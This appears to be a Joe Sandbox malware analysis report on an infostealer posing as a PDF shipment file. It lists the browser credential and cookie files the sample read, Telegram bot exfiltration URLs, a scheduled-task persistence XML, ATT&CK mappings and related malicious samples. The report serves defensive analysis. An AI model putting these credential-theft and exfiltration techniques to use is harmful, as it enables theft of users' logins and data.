                  Source: Yara match File source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7252, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                  Remote Access Functionality

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 311 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 13 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                  [Behavior graph. ID: 1575105; Sample: Shipment 990847575203.pdf.exe; Startdate: 14/12/2024; Architecture: WINDOWS; Score: 100]

                  Source | Detection | Scanner | Label | Link
                  Shipment 990847575203.pdf.exe | 66% | ReversingLabs | Win32.Infostealer.Generic |
                  Shipment 990847575203.pdf.exe | 100% | Joe Sandbox ML | |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Roaming\FZcXKpA.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Roaming\FZcXKpA.exe | 66% | ReversingLabs | Win32.Infostealer.Generic |

                  No Antivirus matches
                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
                  http://kashmirestore.com | 0% | Avira URL Cloud | safe |
                  http://go.microsoHX | 0% | Avira URL Cloud | safe |

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
                  kashmirestore.com | 119.18.54.39 | true | false | | high
                  reallyfreegeoip.org | 172.67.177.134 | true | false | | high
                  api.telegram.org | 149.154.167.220 | true | false | | high
                  fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
                  checkip.dyndns.com | 158.101.44.242 | true | false | | high
                  checkip.dyndns.org | unknown | unknown | false | | high

                  Name | Malicious | Antivirus Detection | Reputation
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2015/12/2024%20/%2013:48:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                  https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2016/12/2024%20/%2009:08:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                  http://checkip.dyndns.org/ | false | | high
                                                                                                      high
                                                                                                      https://reallyfreegeoip.org/xml/Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
193.122.6.168 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
119.18.54.39 | kashmirestore.com | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | unknown | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575105
Start date and time: 2024-12-14 13:48:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Shipment 990847575203.pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@21/15@6/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 199
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.198.119.143, 4.245.163.56, 199.232.214.172, 20.242.39.171, 192.229.221.95, 20.12.23.50
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: Shipment 990847575203.pdf.exe
Time | Type | Description
07:49:30 | API Interceptor | 1x Sleep call for process: Shipment 990847575203.pdf.exe modified
07:49:34 | API Interceptor | 33x Sleep call for process: powershell.exe modified
07:49:39 | API Interceptor | 2614857x Sleep call for process: MSBuild.exe modified
07:49:42 | API Interceptor | 1x Sleep call for process: FZcXKpA.exe modified
13:49:36 | Task Scheduler | Run new task: FZcXKpA path: C:\Users\user\AppData\Roaming\FZcXKpA.exe
                                                                                                                            • 158.101.44.242
                                                                                                                            hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            TELEGRAMRU7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            PUBLIC-DOMAIN-REGISTRYUSList of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                            • 103.53.42.63
                                                                                                                            s0zqlmETpm.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 216.10.240.70
                                                                                                                            Quote_8714.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 199.79.62.115
                                                                                                                            S1a5ZF3ytp.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 103.53.42.63
                                                                                                                            List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 103.53.42.63
                                                                                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 103.53.42.63
                                                                                                                            h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 216.10.240.70
                                                                                                                            Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 119.18.54.39
                                                                                                                            m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 208.91.199.223
                                                                                                                            PO82200487.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 199.79.62.115
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousXWormBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            svhost.vbsGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://nam.dcv.ms/0CX72IqyxfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            No context
                                                                                                                            Process:C:\Users\user\AppData\Roaming\FZcXKpA.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:false
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                            Process:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:true
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):2232
                                                                                                                            Entropy (8bit):5.380134126512796
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:+WSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:+LHxcIalLgZ2KRHWLOug8s
                                                                                                                            MD5:237040D0D4DC4DA299B8838DD92E89BB
                                                                                                                            SHA1:7899A4051517B40A9D92301967AA5FE0E2C8339A
                                                                                                                            SHA-256:AD50548E9B2B4F234ECAA75A6694D331540EFC433CB392C65ED509084D640431
                                                                                                                            SHA-512:101A9725001A400F8F63EADF315F503D84F3CE001468F3CB0BB9BC1DF074A9C9C1D9AC814DAF941CCB3962ED0DDC448F0631CE5340E257E6E3396F6904D84B45
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Users\user\AppData\Roaming\FZcXKpA.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1594
                                                                                                                            Entropy (8bit):5.102543954957388
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLxxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT7v
                                                                                                                            MD5:7BBD543C72679D7BFA194510F0063296
                                                                                                                            SHA1:4AD700FB88EFAD8B2E1F39BE1D4B9A63A7E1AD4E
                                                                                                                            SHA-256:0EF64E7F3C36200CE255C21AA94B7D70B3F45FE70437D5F3B061A311DBF549A0
                                                                                                                            SHA-512:2C867C1AA300A7FEC2DAB0E6FDDD501CA205DD694B76E1809A8EC39A2E2B84D0F09150F50416BD44D0AF527FA6826DF58C8021E230651A2716D0F84025056C08
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                                                                                            Process:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                            Category:dropped
